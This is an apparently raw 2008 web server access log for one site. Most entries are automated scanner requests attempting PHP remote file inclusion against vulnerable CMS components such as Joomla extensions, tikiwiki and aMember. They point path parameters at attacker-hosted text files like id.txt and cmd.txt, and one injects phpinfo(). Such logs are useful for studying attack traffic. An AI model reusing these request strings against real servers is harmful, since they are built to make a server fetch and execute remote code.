80.67.26.187 - - [24/Jun/2008:09:00:16 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:09:00:16 -0700] "GET //includes/messages.inc.php?include_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:00:17 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:00:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:00:44 -0700] "GET /minamijewelry/source_images/?D=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:09:00:48 -0700] "GET /logs/access_080423.log/facileforms.frame.php?ff_compath=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:09:00:48 -0700] "GET /facileforms.frame.php?ff_compath=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:09:00:48 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:01:02 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.155 - - [24/Jun/2008:09:01:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.155 - - [24/Jun/2008:09:01:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.152 - - [24/Jun/2008:09:01:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:01:49 -0700] "GET /logs/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:01:49 -0700] "GET /com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.227 - - [24/Jun/2008:09:01:58 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.227 - - [24/Jun/2008:09:01:58 -0700] "GET //includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.227 - - [24/Jun/2008:09:01:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.51.180 - - [24/Jun/2008:09:02:10 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 500 358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:03:26 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:03:27 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:03:30 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.145 - - [24/Jun/2008:09:03:56 -0700] "GET / HTTP/1.0" 200 18241 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
195.12.62.2 - - [24/Jun/2008:09:04:41 -0700] "GET /logs/access_080220.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:04:43 -0700] "GET /logs/access_080212.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:04:46 -0700] "GET /logs/access_080201.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:04:47 -0700] "GET /logs/access_080212.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.144 - - [24/Jun/2008:09:04:49 -0700] "GET /logs/access_080201.log/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:04:56 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:04:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:04:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:05:04 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:09:05:04 -0700] "GET //includes/messages.inc.php?include_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.223.234 - - [24/Jun/2008:09:05:10 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:27 -0700] "GET /logs/access_080215.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:27 -0700] "GET /logs/access_080215.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:05:29 -0700] "GET /logs//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:05:29 -0700] "GET //includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:32 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:32 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:05:35 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:05:36 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:36 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:05:36 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:05:37 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:05:37 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:05:55 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:05:55 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:05:57 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:05:57 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:01 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:01 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:01 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:01 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:02 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:02 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:06:05 -0700] "GET /logs//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:06:06 -0700] "GET //includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:10 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:11 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:11 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:15 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:15 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:17 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:38 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:09:06:39 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:06:51 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:06:55 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:06:56 -0700] "GET /common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:06:57 -0700] "GET //includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [24/Jun/2008:09:06:57 -0700] "GET /logs//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:09:07:01 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:07:05 -0700] "GET /samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:09 -0700] "GET /common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.91.118.150 - - [24/Jun/2008:09:07:11 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://portalnet.ro/rss-trend/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:09:07:11 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:09:07:12 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:15 -0700] "GET /samPHPweb/playlist.php/common/db.php?commonpath=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:07:16 -0700] "GET /logs/access_080218.log/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:07:16 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:07:16 -0700] "GET /logs/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:22 -0700] "GET /logs/access_080218.log/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:22 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:22 -0700] "GET /logs/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:09:07:34 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:35 -0700] "GET /logs/access_080215.log/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:09:07:35 -0700] "GET //includes/messages.inc.php?include_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:35 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:35 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:07:42 -0700] "GET /logs/access_080215.log/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:48 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:48 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:48 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:50 -0700] "GET /logs/access_080215.log/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:50 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:07:50 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:07:51 -0700] "GET /logs/access_080215.log/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:08:01 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:08:02 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:09:08:02 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:18 -0700] "GET /logs/access_080121.log/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:18 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:18 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:39 -0700] "GET /logs/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:39 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.108.180 - - [24/Jun/2008:09:08:39 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:08:41 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:08:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:08:54 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:08:54 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:08:55 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [24/Jun/2008:09:09:00 -0700] "GET /logs/access_080220.log//include.php?path[docroot]=http://crashoveride.altervista.org/help01.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [24/Jun/2008:09:09:00 -0700] "GET //include.php?path[docroot]=http://crashoveride.altervista.org/help01.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [24/Jun/2008:09:09:00 -0700] "GET /logs//include.php?path[docroot]=http://crashoveride.altervista.org/help01.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:09:02 -0700] "GET /logs/access_080121.log/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:09:02 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:09:02 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:09:18 -0700] "GET /logs/ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.89.210.131 - - [24/Jun/2008:09:09:18 -0700] "GET /ipblock.inc.php?path_escape=http://xl-electronics.com/ebay/icons/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
